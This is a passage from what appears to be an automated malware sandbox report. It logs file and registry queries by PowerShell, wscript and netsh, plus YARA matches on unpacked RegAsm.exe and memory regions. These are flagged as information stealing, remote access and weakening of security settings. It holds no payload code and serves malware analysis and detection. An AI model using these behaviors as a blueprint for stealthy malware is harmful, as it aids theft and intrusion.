Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E39B55 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 8_2_00E39B55
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E392E8 memset,GetVersionExW, 8_2_00E392E8
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

Stealing of Sensitive Information

Source: Yara match File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY